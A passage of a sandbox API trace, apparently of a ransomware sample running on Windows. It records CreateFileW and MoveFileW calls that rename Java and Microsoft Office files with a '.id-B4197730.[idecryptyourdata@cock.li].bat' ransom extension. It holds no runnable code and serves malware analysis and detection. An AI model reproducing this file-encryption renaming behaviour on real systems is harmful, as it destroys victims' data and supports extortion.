0xffffffff [0158.826] CloseHandle (hObject=0x43c) returned 1 [0159.082] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.082] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.082] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.083] CloseHandle (hObject=0x484) returned 1 [0159.083] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.084] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.084] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\default.jfc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.084] CloseHandle (hObject=0x484) returned 1 [0159.085] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.085] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.085] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\profile.jfc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.085] CloseHandle (hObject=0x484) returned 1 [0159.086] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.086] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.087] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr.jar.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.087] CloseHandle (hObject=0x484) returned 1 [0159.088] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.088] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.088] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfxswt.jar.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.088] CloseHandle (hObject=0x484) returned 1 [0159.089] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.089] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.089] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jsse.jar.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.090] CloseHandle (hObject=0x484) returned 1 [0159.090] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.091] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.091] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\logging.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.091] CloseHandle (hObject=0x484) returned 1 [0159.091] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456b7b0, Size=0x4000) returned 0x456b7b0 [0159.091] lstrcmpiW (lpString1=".access", lpString2=".bat") returned -1 [0159.095] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.096] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.096] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.access.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.096] CloseHandle (hObject=0x484) returned 1 [0159.098] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.098] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.098] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.098] CloseHandle (hObject=0x484) returned 1 [0159.099] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.099] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.099] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\management.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.100] CloseHandle (hObject=0x484) returned 1 [0159.101] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.102] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.102] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\snmp.acl.template.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\snmp.acl.template.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.102] CloseHandle (hObject=0x484) returned 1 [0159.103] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.103] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.103] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management-agent.jar.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.103] CloseHandle (hObject=0x484) returned 1 [0159.104] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.104] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.105] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\meta-index.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.105] CloseHandle (hObject=0x484) returned 1 [0159.105] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.105] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.106] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\net.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.106] CloseHandle (hObject=0x484) returned 1 [0159.107] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\plugin.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\plugin.jar.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0159.108] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.108] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.108] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfont.properties.ja.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfont.properties.ja.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.109] CloseHandle (hObject=0x484) returned 1 [0159.110] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.110] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.110] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfontj2d.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.110] CloseHandle (hObject=0x484) returned 1 [0159.111] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\resources.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\resources.jar.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0159.112] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\rt.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\rt.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\rt.jar.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0159.114] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.114] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.114] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklist.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.115] CloseHandle (hObject=0x484) returned 1 [0159.115] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.115] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.115] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklisted.certs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.115] CloseHandle (hObject=0x484) returned 1 [0159.116] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.116] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.116] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\cacerts.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.088] CloseHandle (hObject=0x484) returned 1 [0160.327] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvsubsystems32.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvsubsystems32.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0160.327] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvsubsystems64.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvsubsystems64.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0160.331] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\mfc140u.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\client\\mfc140u.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0160.341] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.341] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.341] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\baby_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.341] CloseHandle (hObject=0x438) returned 1 [0160.343] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.343] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.343] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\carbn_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.343] CloseHandle (hObject=0x438) returned 1 [0160.344] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.344] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.344] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cmnty_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.344] CloseHandle (hObject=0x438) returned 1 [0160.347] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.347] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.347] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\east_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.347] CloseHandle (hObject=0x438) returned 1 [0160.349] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.349] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.349] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\explr_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.349] CloseHandle (hObject=0x438) returned 1 [0160.350] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.350] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.350] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fall_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.351] CloseHandle (hObject=0x438) returned 1 [0160.352] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.352] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.352] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.353] CloseHandle (hObject=0x438) returned 1 [0160.353] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.354] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.354] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_02.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.354] CloseHandle (hObject=0x438) returned 1 [0160.355] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.355] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.356] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grden_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.356] CloseHandle (hObject=0x438) returned 1 [0160.356] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.357] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.357] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grid_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.357] CloseHandle (hObject=0x438) returned 1 [0160.359] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.359] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.359] CreateFileW (lpFileName="C:\\Program 